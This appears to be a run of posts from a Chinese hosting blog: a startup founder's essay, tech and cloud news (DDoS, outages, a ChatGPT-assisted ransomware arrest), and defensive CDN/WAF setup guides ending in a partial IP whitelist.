毕竟真正有创业经历的还是少数,更何况二次三次,有的人趁着风口拿到钱,是非常容易和简单的,这是大环境的错。 也是我们自身的错,更是投资人的错。 三方的“努力”,构成了现在这个繁杂浑浊的创业圈子,乌烟瘴气,空口唾沫乱飞,在互联网的时代,打的全是信息不对称的牌,还因此沾沾自喜,洋洋得意,明眼人真的是会在心里发笑的。 很多人创业时候,都很喜欢谈从0到1的艰难,从1到100的艰难,其实,真正难的,是从1到0的跨越。 换言之,很多人很容易接受成功,因为你在做一件事的时候,想到的一定都是,成功了之后,我该如何如何。 就算我们内心里想到了风险,可是还是会不自觉的去憧憬和盼望未来的辉煌。 然而,创业者心里都应该清楚,创业成功的可能性极其的微小,任何一个成功的可能性都会被无数个困难逼得退无可退,极其艰难。 我们确实应该保持着乐观和积极的态度去创业,但是更应该做好从1到0,再到1的跨越和勇气。 很多人可能不知道其中的难度,我举个例子。 创业做一个产品,就像孕育一个孩子,孩子的出生和成长,就是从0到1的过程。 突然有一天,孩子夭折了。 这就是我说的,从1到0的痛苦。 其中令人难以接受的程度,我想已经不用我多说了,大家都能体会。 关键是,你是否还有勇气重新再来一次,再生一个孩子,像从前一样去孕育它,而且做好它随时 可能再一次夭折的准备。 第一次的从0到1并不算多难,尤其是现在的创业大潮下,我觉得是比较容易的一件事。 真正难的是,第二次的从0到1。 只要是创业的人都能知道,第一次就想成功,非常的难,概率基本上和”万中无一的绝世高手“差不多,所以,还是先做好失败的准备吧。 尤其是做好失败之后,是否还站得起来,重新再来的准备。 —— 我的团队想解决的问题很简单,现在互联网如此的发达,每个人人手一部手机,道路上,车站上,地铁上,茶馆,教师,食堂,无时无刻,你都会看到一个人低着头在那儿玩手机,甚至是很小的婴孩,他们都已经知道拿到一个大屏幕要用大拇指上下的滑动。 我们已经渐渐的迷醉在这个虚拟的网络世界里了,就算明明知道这样不好,浪费了太多的时间和精力,可依然还是无法自拔的深陷。 每个人一天24个小时,平均睡觉8小时,吃饭等生活必须时间平均为2小时,每天还剩下不到14个小时,一年为5110个小时,中国人类的平均寿命72岁,那么平均每人可支配时间为367920小时。 人人出生环境经济状况成长经历各有不同,只有这367920个小时几乎对每一个人都是公平的。 时间才是每一个人最宝贵的财富,最应该得到重视和管理的财富。 然而,绝大多数人没有良好的时间管理概念,在时间使用上随性为之。 同时,基于自由和连接为基础的互联网与移动互联网的普及,越来越多的商家花尽心思琢磨人性需求,以此来抢夺用户的时间为自己创造利润。 游戏,影音,社交,只要你有需求,你都能在互联网上得到满足。在越来越多的商家围攻之下,在他们日夜不停的研究开发的“武器”攻击之下,普通人那一点可怜的自制力已然溃不成军。 中国网络游戏人口已经超过4亿人次,移动端持有人数超过7亿,在移动端上玩游戏的人数也不少,再加上社交、影音、网页浏览、小说阅读等各种应用的普及,据我简单统计,人们花在移动端上的日均使用时间已经接近5个小时,并且这个趋势还在不断增大。 正因此,低头族成为全球最大的种族,拖延症、网瘾症、手机依赖症、社交成瘾症已经成为这个时代的显著病症。 后面我就不多说了。 这个时候,很多人开口就会问我,你这个市场份额有多大呢? 盈利点在哪儿呢? 我什么时候能收回成本呢? 每当听到这样的问话,我觉得无可厚非的同时,已经和这样的投资人绝缘了。 我会拒绝投资,我也会起身反驳,据理力争,在我看来,投资人不是我爹娘,更不是爷。 我要培养我的产品,就是我的孩子,你要是首先不能认同,说再多也是无意义的,我也不愿去拜托和多说。 我们一群年轻人,为了这么一件事情,都不拿工资,蜗居整理方案和思路,大锅菜,大锅饭,泡面。 温馨又爽快。 一个初创团队,在产品还未落地之前,已经将十年计划完全理通顺了,我想这样的团队是少之又少的,也可以让任何人知道我们的用心,也知道我们的决心。 我不追逐钱和名,我只求踏实做好自己的产品,投资人的加入如果会带来很多奇奇怪怪的因素, 比如不顾用户感受,改变商业模式去赚钱,去资本上市,我宁愿不要。 当你能真正的为他人服务,造福社会,至少能带来一丝丝善意的改变时,属于你的,属于团队的,属于公司的,属于员工的,该有的金钱和荣誉,都会有的。 前提是,你是否能坚持到那一天。 是否有足够的自信,相信自己的项目和团队,相信自己的产品能够获得成功。 我相信,所以我不怯。 我的合伙人也是一个很有情怀的人,他发现了自己行业的黑幕,孤身一人上路面对行业的巨头公司,据理力争,打赢了一场难以想象难度的官司,其难度不亚于以前的老百姓见皇帝。 他不但打赢了,而且现在在无偿的帮助更多的行业学生发现这个行业的黑幕,教会他们怎么做,能保护自己的利益不受损害。 可能这也是我们能聚到一起的原因,不用说太多,就能知道对方的想法。 因为我们是同一种人啊! 这个团队,让我感到骄傲,骄傲的是你们都在,我不一一点名,不过如果你们看到这篇文章,一定知道我在说你们! 创业,贵在坚持,前提是,你知道自己所坚持的这件事一定是有意义的,方向是对的,所以你的 坚持是有价值的。 所以,我们坚持。 我的项目其实比较明显,这是一个很实在的社会问题,大家都认识到了,这个市场份额说大可大,10亿人都需要,说小也小,看你是否能运营得下去,是否能做到这个份额。 整个社会大发展,现在是互联网时代,再过几年,绝对是硬件时代的到来。 可是在硬件时代来临的时候呢,国内还有什么样的问题没有解决? 是国民素质! 是精神文明建设! 我和团队说过,时代的发展,是人的发展,再先进的东西,都需要人来驾驭,而不是被驾驭。 在我国去看心理医生都能被称为病态,遮遮掩掩的时候,不觉得已经存在很大的问题隐患了吗? 人最重要的是时间! 只有规划好时间,你才能有更多的精力去完成自己的事情,去学习,去旅游,去读书,生理和心理方面的问题才能更大限度的得到改善和解决。 人们身心愉悦,有目标,有规划,有方向,有梦想,全都得归结于对时间的把控,这一块做好了,人们内心的忧虑就会减少,和他人以及周遭环境的交流会增多,很多社会的隐患问题,不说完全解决,但至少能有很大很大的改善。 所以,时间管理这一个模块,仅仅只是一个切入点,但很多的人还没听到后面,还不知道我们在之后会切入什么样的领域,时间管理APP如何走到线下落地,如何产生让人惊喜的商业化反响,又如何切回到硬件时代,与其接轨,完成生态循环,就妄自的下了“死令”的结论。 很多人会说我没有把问题说清楚,你应该尽可能的去告诉投资人你最后想怎么做。 不好意思,我不是普通的90后,我也不是初出茅庐的创业者,我要做的事情首先得谈情怀,我首先得告诉你,为什么这件事情一定是我来做,别人不行。为什么未来的发展大势一定会是这样,为什么我的产品一定会受欢迎。 只有你认同了这一点,认同了这个问题是一个大的问题,而且急需解决,并且你很感兴趣,OK,那咱们才可以继续谈。 我和那些拼了命想要路演,去融资,去圈钱,去炫耀,去上市的创业者不一样,我想做的是产品,是服务,我自己包括我的初创团队,为此做好了在这个项目上苦拼二十年的准备。 我的产品是我的骄傲,现在不是投资人选我,是我在看投资人。 一个我喜欢的,有情怀的投资人,我会拼了命的去和他讲我的产品,讲现在,讲以后,讲未来,讲到他不愿意听为止。 也许你会觉得我在说大话,一个项目而已,有什么了不起的,吹什么牛。 这个没有关系,随它去吧。 就像我最初创业的那样,我失败了,多的是这样的人来说三道四,因为我还没有成功。 我可能也不会成功,但我依然会这么走下去。 真诚做人,认真做事,专注于帮助和支持他人,做产品,做服务,重在参与与分享,只求一声“谢谢你”或是“有你这样的朋友真不错”,足矣。 以上就是我个人的创业经历,和一些道路上的体会,说得乱七八糟,奇奇怪怪,就像这些经历一样,杂乱无章。 如果你觉得有用的话,就提取收藏。 如果你觉得没用而且难听又不可口,尽管来喷吧,反正我也不会理会。 走我自己的路,用我的产品帮助更多力所能及的人,这是我要做的。 说到最后,其实也是想通过这一篇文章表达一点,如果你认同我,认同我们(MT:My time My turn!manage time!)要做的事情,很欢迎你和我联系,我们现在非常的需要UI设计师和技术合伙人,你不一定很厉害,但我们可以一起努力,这件事做好。 屌丝团队不一定赢不了天下,关键还看人,看团队! 无论你来自哪里,拥有什么样的能力,只要志同道合,我们就一定能找到携手之处,共同出发。 总结: 1. 要想活得轻松自在,首先你得先艰难过,要不然你尝不出滋味。 2. 要想活得高尚脱俗,首先你得历尽世俗之事,要不然不过是嘴上无毛办事不牢。 3. 淡泊名利,你连名利的边都还没碰过,谈何淡泊。 4. 看起来成熟的人,你并不知道他为了这份成熟,究竟付出了多少代价。 5. 一个人宽容和微笑的背后,是他不为人知的辛酸和苦痛,在心里最痛苦的时候还有幽默的心去开玩笑,这样的人值得尊敬和结交。 6. 不要太经常去听什么狗屁的成功学,那和你几乎没有什么关系,这是真话,失败的经历可以学习,但也不要杞人忧天,最好的方式,是自己去做,去经历,然后像我一样的写出来,勉励自己,也知会他人,共同成长。 7. 耳听为虚,眼见为实。 8. 勿忘初心,方得始终。 感谢阅读到此的朋友们,谢谢。 MT创始人:阿超 2015年9月24日。 #### 分享站长“阳”了的经历 自从疫情开放后,很多人都“阳”了。主机吧很少去人多的地方,暂时倒没有“阳”,不过站长群里已经有“阳”的案例了。这里主机吧给分享一位站长“阳”的经历给大家,如果你也得“阳”了,希望可以帮助大家。 好吧我就是一个,昨天一起来明显感觉身上肌肉酸疼,有点发热,量了一下体温37.5,也没管。 到了中午就不行了,身上疼得厉害,头也疼,体温直接38.5,然后就吃布洛芬吧,然后多喝温水。 下午三点多更难受,只想睡觉,体温晾了几次全部是39度,别说体质,啥体制受不了啊,烧的全身疼,头也疼。 一直持续到晚上6点,体温居高不下,还是39,又吃了一次布洛芬,到了晚上9点,体温依旧39.然后我媳妇煮了了点生姜、红糖、大葱、大蒜水,喝完钻被窝出了一点汗 这个时候吃了一顿连花清瘟,只是想缓解一下头疼;然后又用热水和酒精给身上来了个物理降温。 一直到了晚上11点,体温降低到38,5,算是感觉好点 大早上的明显感觉好一些,但是凉了几次体温依旧接近38度,但是相比昨天还是算好的了,身上也没那么疼了,就是头依旧炸裂一般的疼,于是又搞了点连花清瘟。 希望能早点好 https://www.4414.cn/thread-123143-1-1.html #### 分析称:过去十年,Windows 10漏洞少于Linux、Mac OS X和Android 3月9日 消息:对美国国家标准与技术研究所(National Institute of Standards and Technology)国家漏洞数据库的分析显示,如果漏洞的数量有任何可利用性的迹象,那么Windows10 似乎比Android、Mac OS或Linux安全得多。 在过去的十年中,Debian Linux有 3067 个技术漏洞,他们将这些漏洞定义为“一种特征或配置,攻击者可以利用这些特征或配置获得未经授权的访问或滥用网络及其资源”;其次是Android系统,有 2563 个漏洞;Linux kernel 有 2357 楼哦东;Mac OS X有2212 漏洞。 值得注意的是,Windows10 只记录了 1111 个技术漏洞,即使把Windows 10( 2015 年发布)和Windows 7( 2009 年发布)的漏洞数叠加,总数仍然比Android和Debian Linux少得多。 当然,微软的产品比Windows多得多,这意味着这个软件巨头也有更多的漏洞。过去 10 年,微软报告了 6814 个漏洞,高居榜首,但平均每个产品只有12. 9 个漏洞,而谷歌和苹果平均每个产品分别有54. 4 个和37. 9 个漏洞。 报告还指出,虽然数以千计的技术漏洞可能令人担忧,但平均在 197 天内发现漏洞,并在 69 天内加以控制。(mspoweruser) #### 分析腾讯云、阿里云、百度云三家云服务器商哪个好 腾讯云是腾讯旗下的一家云服务品牌,阿里云是阿里粑粑旗下的一家云服务品牌,百度云是百度旗下的一家云服务品牌。只要是想买云服务器的站长几乎都考虑过这三家云服务商的其中一家。而阿里云几乎占据了云服务器市场的50%,也就是说100个使用云服务器的,就有50个是他们家的。腾讯云也占10%左右,而百度云占有率几乎不存在,估计1%的份额都不到。之所以会放在这里和前两家比是站在站长的位置思考,毕竟百度还是国内最大的搜索引擎。其实这三家公司并没有哪家比较好的区分,因为各有各的优势,不同应用使用也各有优势,今天主机吧从站长的角度分析这三家的优势。首先我们从配置选取个,主机吧心中的标准配置是2核4G5M50G。腾讯云的价格是3276元/年阿里云的3203元/年百度云的3251元/年价格上三家相差无几,但我们需要注意的是腾讯云和百度云使用的CPU是Skylake Xeon Gold 6148 CPU 2.4GHz,而阿里云使用的CPU是Intel Xeon(Skylake) Platinum 8163 2.5GHz,看数字我们就知道阿里云的CPU型号更高,而且主频更高,好的CPU可以让服务器响应更快,更稳定,并发更高。所以在相同配置下阿里云是有明显的优势的。而我们看到腾讯云和阿里云显示的内网带宽分别为1.5G、1G。而百度云由于是不显示的这边就不作对比 从内网带宽上看腾讯云是比阿里云要高,但我们从内网发包上看,阿里云是要比腾讯云高的,也就是说阿里云运行效率要比腾讯云高。从 DDOS防护方面看,腾讯云免费提供2G DDOS防护,百度云免费提供5G DDOS防护,阿里云免费提供5G DDOS防护。所以从以上分析主机吧得出一个结论,如果你的网站追求极致体验那么使用阿里们就是最好的选择,因为阿里云不论是性能配置还是防护能力都是三家最好的,而且提供多种应用场景配置选择。如果你不追求极致,更倾向于百度搜索引擎契合度,那百度云们就是最好的选择,因为百度搜索的很多业务都是放百度云的,如果你网站放在他们家产品上,无疑跟内网没啥区别,百度搜索访问网站的速度,理论上收录会好很多。而腾讯云优势在于有庞大公众号与小程序,如果你网站接入公众号或者小程序的话腾讯云还是非常不错的选择。好了 以上就是主机吧对三家云服务商的优势简单分析,没什么技术分析,简单从表面上看而以,希望可以帮到大家。 #### 刘强东、陈天桥、柳传志……大佬们的第一桶金的故事 1.刘强东:现任京东 集团董事局主席兼执行官   第一桶金——代理电脑硬盘 1998年3月,从一家外企辞职的刘强东,当时的刘强东本着踏实本分的原则在中关村做多媒体生意,从刘强东这里买了刻录机的顾客,几乎都成为当地唯一会做电脑效果图的人,良好的口碑让这些客户的同行们纷纷开始打听这种能够编辑字幕、做各种特效的刻录机和软件的购买渠道。半年后,客户在京东门外排起了长队,刘强东的生意越来越好,虽然价格逐步提高,但刻录机却越卖越火。此后,京东开始代理雅马哈、理光、NEC的产品,并获得全国独家代理权。 1999年,京东多媒体经过一年多的发展,规模壮大了,原来的办公场所已经容纳不下刘强东了,他把北大资源西楼2422房间租了下来,房间面积有18平方米,公司很快搬了过去。刘强东的柜台数量也在快速增加。不久之后,刘强东又把隔壁的2426、2424租下来。2000年,刘强东买下了北大资源西楼的12层。 当时的刘强东可能并没有想到,18年后的今天,他会在北京亦庄经济开发区,拥有总面积达到28万平方米的办公楼。   2.陈天桥:现任盛大网络董事会主席和首席执行官   第一桶金——代理韩国传奇游戏 陈天桥应该是喜好赌注的。26岁的他,1999年突然辞去陆家嘴集团分公司经理职务而与妻子、弟弟等一起做动漫网站,这曾让很多人无法理解。而后,他在获得了中华网300万美元投资后,2001年,再次把全部身家投入到《传奇》游戏的代理费用上。 游戏代理后,面临的困难接踵而来。服务器无钱租用是最大的问题。陈天桥便以中韩代理的国际性合同为诱饵,游走于各地服务器、电信提供商之间。或许他足够幸运,或许他的创业激情感动了谁。难题最终迎刃而解,他得到了免费使用2个月服务器的资格。自此,也拉开了中国代理海外网络游戏的序幕。 2001年9月28日,《传奇》公测。同时在线人数已经突破40万人,全国的点卡销售几乎一空,资金迅速回笼。陈天桥的这张赌博胜利的。4个月之后,《传奇》一举成为世界平均在线人数最多的网络游戏。   3.柳传志:现任联想集团有限公司 董事局名誉主席,联想集团高级顾问   第一桶金——代理汉字系统 1980年代初,计算机革命已经在全球兴起,硅谷也成为中国的技术研究者们的热门话题。中科院内部的科技人员早已经禁不住诱惑,不断走出高墙深院创立公司。时任计算所所长的曾茂朝(现任联想控股董事长)也一直在私下里鼓励手下创立公司。已年逾40岁的柳传志主动提出了要创业。 虽然得到的帮助很多,但是从1984年冬天到1985年春天的几个月里,公司里最令人头疼的是不知道去干什么。柳传志后来回忆,“当时实在是不知道要干什么好了,所以能干什么就先干着,哪怕挣点儿钱发工资也好。”于是,包括柳在内的所有员工都当过“倒爷”。 终于来到了1985年,所有可能为公司带来收入的各种业务几乎试了一个遍。其中最重要的事情是将计算所倪光南主导开发的“汉字系统”带到了公司,代理此产品,成果产品化后就是后来知名的“汉卡”。当时电脑大部分靠进口,全是英文系统,必须装上汉卡,每台电脑经过改装后利润高达一、两万元。联想在6个月内至少销售出了100套,为公司带来了约40万元毛利润。 这些大佬的传奇故事,都是从一次代理开始的。 #### 刚刚DNSPOD挂了!站长群一片哀号! 相信很多站长都用了腾讯的DNS--DNSPOD,就在刚才DNSPOD故障了!导致起码有30%的中小网站无法访问,全国站长一片哀嚎! 站长群一片哀嚎,主机吧所在的三个站长群都热闹起来了。 截至目前11点钟为止,腾讯DNS并没有恢复。 自从腾讯收购DNSPOD以来,DNSPOD在腾讯的地位也是一天不如一天,故障率频发,国际版相继下线,解析也越来越垃圾,曾经占据国内域名DNS半壁江山的DNSPOD现在成为人们疯狂吐嘈的对象。 实事上,主机吧已知本月以来腾讯云已经故障过两次了,这对于一个国内排前三的云服务商实属不应该,在主机吧看来,国内除了阿里云,其它云服务商都有点喳喳灰。毕竟国内最早做云计算的就是阿里云,经过多年的研发,代码一行一行打出来的飞天系统相当稳定。云计算方面百度起步较晚,不过以技术出身的百度目前也在云计算方面发力,主机吧的服务器就是用百度的云服务器和百度CDN运营的,效果相当好。   #### 创记录!Cloudflare成功防御每秒 1720 万个请求的 DDoS 攻击! 互联网基础设施公司Cloudflare近日披露,它已化解了迄今为止所记录的最大规模的容量耗尽分布式拒绝服务(DDoS)攻击。这次攻击发生在上个月,目标是Cloudflare在金融行业的其中一个客户。Cloudflare表示,攻击者使用了由20000多个受感染设备组成的僵尸网络向该客户的网络发送大量的HTTP 请求,以耗尽服务器资源,从而使其崩溃。这种攻击名为容量耗尽DDoS,不同于典型的带宽DDoS攻击。在典型的带宽DDoS攻击中,攻击者试图耗尽并阻塞受害者的互联网连接带宽。而在容量耗尽DDoS攻击中,攻击者改而专注于向受害者的服务器发送尽可能多的垃圾HTTP请求,以便占用宝贵的服务器CPU和内存,并阻止合法用户使用目标网站。Cloudflare表示,这次攻击的峰值达到了每秒1720万个HTTP请求,该公司称这个数字几乎是公共领域迄今所报告的之前任何容量耗尽DDoS攻击的三倍。Cloudflare表示,虽然攻击峰值达到每秒1720万个HTTP请求,但攻击者利用僵尸网络攻击客户持续了数小时之久,在此期间忍受的垃圾HTTP请求超过3.3亿个。但是僵尸网络运营商在这次最初的攻击之后并没有收手。Cloudflare表示,同一个僵尸网络在随后的几周内还发动了另外两次大规模攻击,其中另一次攻击峰值达到每秒800万个HTTP请求,目标是一家网络托管服务提供商。Cloudflare表示,它目前正在跟踪这个僵尸网络的演变,它似乎是使用臭名昭著的Mirai物联网恶意软件的修改版本构建而成的。Cloudflare表示,从受感染设备(机器人程序)的IP地址来看,攻击者的流量中15%来自印度尼西亚,而另外17%的恶意流量来自印度和巴西。这次每秒达到1720万个HTTP请求的攻击还在Cloudflare公司在2021年第二季度处理的合法HTTP流量(估计每秒2500万个HTTP请求)中占到了68%。之前有史以来最大规模的带宽DDoS攻击是每秒2.3 TB(2.4Tbps),是由AWS在2020年2月测得的。 #### 初创企业有必要建设自己网站并且做seo吗? 收到知呼邀请回答这个问题,觉得很有意思,今天主机吧就来聊聊初创企业要不要建立自己的官网,并做SEO。 我们先来直接说答案:很有必要! 从长远角度考虑,不管是初创企业还是大中型企业,建立官网和SEO都是非常有必要且必须执行的,我们来总结下以下原因: 1.增加用户信任感 拥有自己的官网的企业和没有官方的企业给客户的感觉是有很大区别的,很多时候我们要了解一家企业往往都是通过他的官网了解的,如果连企业官网的都没有,会大大降低了客户对你的信任感。 尽管目前很多营销方式,比如发抖音、知呼发文章、百家号发文章都是一种营销方式,但是客户要更加深刻的了解你的企业,都是通过官网来了解的。 2.增加曝光度 现在企业要推广方式很多,如抖音号、公众号、百家号,但是往往带有企业产品的链接是得不到他们的流量的,即使你内容做得再好也不会多少曝光度,甚至可能因为广告内容而被降权,而且第三方平台给你展示的东西是相当少的,想要发文章,想要发视频,展示企业全貌,这些都是无法满足的,而独立的官网是完全没问题的。 3.更容易吸引客户 一个好的企业官网,是可以吸引客户,并让客户最终选择我们产品的,连官网都没有或者企业官网粗制滥造,是会影响客户购买产品的。 4.长期免费的流量 SEO,这词在当年是相当火的,简单的说就是利用搜索引擎引流的技术,就SEO。虽然现在从百度搜索引擎来的流量已经大不前,但是其依然是各大网站主要的流量来源。SEO可以让企业网站免费获得来自搜索引擎的流量,减少营销成本,当然SEO本身就是一件长期的工作,见效是非常慢的,但一但做好,收益也是相当可观的。 好了,以上就是主机吧对初创企业是否建立网站与SEO的见解,希望可以帮助大家,如果您喜欢主机吧,欢迎收藏点赞。     #### 删库跑路程序员被判了:判刑10个月 还记得去年某程序员删库跑路事件吗?目前判决书下来了: 判决书显示, 2021 年 3 月起,被告人录某入职B公司,负责京东到家平台的代码研发工作。同年 6 月 18 日,被告人录某从B公司离职。当日,被告人录某未经许可用本人账户登录服务器,将其在职期间所写京东到家平台优惠券、预算系统以及补贴规则等代码删除,导致原定按期上线项目延后。 经审计,为保证系统运行通畅,公司聘请第三方公司恢复数据库等共计支出人民币约 3 万元。 案发后,被告人录某在家属帮助下赔偿A公司人民币3. 5 万元并取得谅解。 法院认为,被告人录某违反国家规定,对计算机信息系统中存储数据进行删除,后果严重,其行为已构成破坏计算机信息系统罪,后判处录某有期徒刑十个月。 近年来,程序员删库事件常有发生,大公司重要数据还是要每天做好备份才是。 #### 利用 ChatGPT 写木马“AI 辅助”勒索病毒被抓 案件概述 近日,杭州上城区网警成功破获一起涉及重大勒索病毒案件,犯罪团伙成员均有网络安防相关资质,并在实施犯罪过程中借助ChatGPT进行“AI辅助”优化木马程序。 案件详情 杭州上城区网警在11月20日接到辖区某公司报案称,该公司名下相关服务器遭勒索病毒攻击,导致公司所有系统无法正常运行,对方勒索2万USDT数字货币(约合2万美元,当前约14.3万元人民币)。 据报道,犯罪团伙成员在实施犯罪过程中,借助ChatGPT进行“AI辅助”优化木马程序,以此提升勒索病毒的效率和效果。 案件处理 目前,相关犯罪嫌疑人已被警方依法采取刑事强制措施。 案件影响 此次案件的破获,展示了我国公安部门对于网络安全的高度重视,以及他们在打击网络犯罪方面的决心和能力。同时,这也提醒我们,网络安全问题不容忽视,我们应当加强自我防护,防止成为网络犯罪的受害者。 #### 利用AI给百度云防护做自定义拦截页面 有同学说百度默认的拦截页面很丑,想改一改怎么办? 答案很简单,利用AI给的拦截页面美化一下就行,操作很简单,进入百度云防护控制台-基础功能-自定义拦截页-设置 然后我们复制下面的默认的HTML代码。 再进入目前流行的AI叫他帮你美化,比如主机帮用豆包。 把默认代码复制下来,然后跟AI说帮我美化下拦截页面 AI就会给你编辑一个新的拦截页面,如果你觉得不好看,也可以叫他换一个 得到满意的页面后,我们再复制这个代码到百度云防护自定义页面HTML那里,确认即可完成自定义拦截页面。 #### 利用sitelock CDN给WIX网站加速国内访问 Wix.com – 全球知名的云端自助建站平台。国内很多中小企业使用这个平台来做网站。 不过,Wix其实是禁止国内访问的,这里从他的网站CDN节点就可以看出来了。 从上图可以看到Wix使用的是谷歌的CDN节点,但这个CDN针对针对中国进行了封禁,国外访问却是正常的,所以采用Wix做的网站天然国内就无法访问,那么如何才能实现访问呢? 今天主机帮利用sitelock CDN来实现国内访问,方法很简单,购买开通sitelock 套餐,进入站点设置-常规设置-站点IP地址,把Wix的解析地址输入进去,如下图: 保存修改后,我们再找到DNS设置,把复制cname记录,如果是根域名解析复制a记录 然后进入域名DNS解析,修改上面的解析记录即可。 需要注意的事,如果你的网站开启了HTTPS,那么你需要把SSL证书上传到sitelock CDN才可以正常访问。值得一提的是Wix默认的SSL证书是无法下载到第三方平台使用的,那么我们就需要自己申请一个单独的SSL证书,然后上传至sitelock CDN。 解析配置成功sitelock CDN后,我们来测试下效果,解析生效的国内已经可以访问了,而没生效的谷歌地址是访问失败的,这样我们等全部生效就可以了。 #### 利用京东云星盾SCDN拦截网站漏洞攻击 如果你的网站经常被黑客扫描,入侵怎么办? 除了网站漏洞修复外,我们应该买个WEB应用防火墙。 如果我又想防御DDOS、CC攻击怎么办? 那么用京东云星盾是最合适的,京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 简单的说,京东云星盾既可以拦截漏洞扫描,也可以拦截CC攻击,同时还防御DDOS攻击。 效果怎么样呢?以主机吧今天客户接入的案例为例: 接入后成功拦截各类漏洞扫描 有详细报表一目了然,防御效果杠杠的。 需要联系主机吧购买:https://zhujib.com/jdxingdun.html #### 利用京东云星盾SCDN防御CC攻击实例 最近,有位客户向主机吧反馈,网站开启京东云星盾的遭遇攻击模式还是被CC攻击到了。 主机吧登陆星盾查看安全事件发现星盾有正常拦截。 查看网站请求日志发现并发也很小,但是这些请求明显是不正常的,请求大量的错误页,导致服务器崩溃了。 主机吧的解决办法是:进入星盾,安全规则-防火墙规则-创建新的防火墙规则,规则如下: 规则描述: JS挑战 字段: 请求方法 运算符:等于 值:GET 操作:JS挑战 确定! 开启后5分钟我们看效果: 成功拦截,服务器恢复,网站正常访问! 有需要的同学联系主机吧购买防御,价格优惠,包安装包指导! #### 利用京东云星盾给阿里云服务器防御DDOS攻击 【阿里云】尊敬的阿里云用户:您的IP:123.100.131.129 受到攻击流量已超过云盾DDoS基础防护的带宽峰值,服务器的所有访问已被屏蔽,如果90分钟后攻击停止将自动解除否则会延期解除。详情请登录【云盾控制台】-【DDoS基础防护】查看或致电95187-1进行咨询。 最近有客户收到阿里云的短信提醒,表示服务器被攻击了。联系上主机吧进行防御。 主机吧在让客户更换新的服务器IP后,给客户开了百度云加速商务版进行防御,不过却出了个问题,接入百度云加速后,后台出现无效请求的错误,在多方检测后,发现可能是百度高防CDN的问题。 再三考虑后我们给客户更换了京东云星盾,京东云星盾是这边最新代理的高防产品。相比百度云加速,惊动云星盾更有想象力,防御能力更高,而价格跟百度云加速差不多。 给客户接入了商业版,代理价只需1520元一年,非常划算,目前防御100G左右的DDOS攻击都不是问题。 星盾带的WAF防火墙非常厉害,默认带有最新的漏洞规则拦截,还可以自义防火墙规则,拦截特定UA、URI等。 总之星盾是一个不错的网站、APP防御产品,主机吧推荐大家使用,有需要的可以联系主机吧购买。 #### 利用京东云星盾高防CDN拦截百万级CC攻击的经历 最近,有位站长的网站遭遇了超大量的CC攻击,在主机吧的推荐下,购买了京东云星盾高防CDN进行防御,并成功拦截。下面我们来说下成功防御的操作: 1.成功接入后我们进入安全规则-托管规则-Web应用程序防火墙开启 2.开启OWASP 核心规则集,规则等于高,操作阻止 3.进入防火墙设置,开启BOT识别模式功能、安全级别:遭遇攻击模式、挑战周期:15分钟、浏览器完整性检查:开启 4.如依然没有效果,我们进入防火墙规则,创建自义CC防火墙规则,设置拦截海外IP、首页JS挑战、全站安全检测规则。具体操作请看教程《京东云星盾SCDN常用自义CC防御规则设置》 5.设置完成后,我们再看效果,成功拦截。 从上图我们可以看到CC攻击的并发高达 400万次,其中系统默认规则拦截了45%左右,而自定义规则拦截了45%左右,系统安全级别拦截了10%左右。 京东云星盾防御CC攻击真的好强!而且极具性价比,虽然CC攻击效果套餐流量,但是其流量消耗非常少,只是比正常访问流量高些。 有需要京东云星盾的同学可以联系主机吧购买,主机吧可以免费帮接入,设置防御。 #### 利用宝塔防火墙+百度云加速CDN拦截海外IP方法 虽然百度云加速也支持海外IP防御,不过这个功能需要商务版才可以开启,而且即使开启海外防御也是会计算进套餐里的,那样的话相当不值得。 今天主机吧教大家利用宝塔防火墙搭配百度云加速CDN拦截海外IP。 首先,开启宝塔的防火墙,然后添加百度云加速IP白名单,记住第一件事是添加IP白名单。 IP白名单如下: 111.174.61.1-111.174.61.255111.174.63.1-111.174.63.255220.195.21.1-220.195.21.255220.195.22.1-220.195.22.255119.84.92.1-119.84.92.255119.84.93.1-119.84.93.255117.27.149.1-117.27.149.255119.167.246.1-119.167.246.255116.31.126.1-116.31.126.255116.31.127.1-116.31.127.255183.60.235.1-183.60.235.255112.25.89.1-112.25.89.255112.25.90.1-112.25.90.255112.25.91.1-112.25.91.255112.29.157.1-112.29.157.255112.29.158.1-112.29.158.255112.29.159.1-112.29.159.255115.231.186.1-115.231.186.255115.231.187.1-115.231.187.255122.246.5.1-122.246.5.255119.188.9.1-119.188.9.255119.188.97.1-119.188.97.255119.188.14.1-119.188.14.255119.188.132.1-119.188.132.255119.188.70.64-119.188.70.12742.81.6.1-42.81.6.25542.81.8.1-42.81.8.255117.34.13.1-117.34.13.255117.34.14.1-117.34.14.255117.34.60.1-117.34.60.255117.34.61.1-117.34.61.255117.34.62.1-117.34.62.255117.34.28.1-117.34.28.255101.69.175.1-101.69.175.25561.241.118.1-61.241.118.255117.147.214.1-117.147.214.255117.147.215.1-117.147.215.255221.178.56.1-221.178.56.255221.178.57.1-221.178.57.255221.178.58.1-221.178.58.63150.138.149.1-150.138.149.255150.138.150.1-150.138.150.255150.138.151.1-150.138.151.255124.95.191.1-124.95.191.255124.95.168.1-124.95.168.255124.95.188.1-124.95.188.255219.159.190.1-219.159.190.255222.216.190.1-222.216.190.255219.159.84.1-219.159.84.255122.190.1.1-122.190.1.255122.190.2.1-122.190.2.255122.190.3.1-122.190.3.255220.170.184.1-220.170.184.255220.170.185.1-220.170.185.255220.170.186.1-220.170.186.255113.207.100.1-113.207.100.255113.207.101.1-113.207.101.255113.207.102.1-113.207.102.255183.232.51.1-183.232.51.255183.232.53.1-183.232.53.255183.61.177.1-183.61.177.255119.147.134.1-119.147.134.255183.61.236.1-183.61.236.255183.61.190.1-183.61.190.25514.17.71.1-14.17.71.255157.255.24.1-157.255.24.255157.255.25.1-157.255.25.255157.255.26.1-157.255.26.255111.32.134.1-111.32.134.255111.32.135.1-111.32.135.255111.32.136.1-111.32.136.255125.39.174.1-125.39.174.255125.39.238.1-125.39.238.255125.39.239.1-125.39.239.25542.236.93.1-42.236.93.25542.236.94.1-42.236.94.25542.236.7.64-42.236.7.12742.236.7.128-42.236.7.25558.211.2.1-58.211.2.25558.211.137.1-58.211.137.25561.155.149.1-61.155.149.255111.132.134.1-111.132.134.255111.132.135.1-111.132.135.255111.132.136.1-111.132.136.255180.163.188.1-1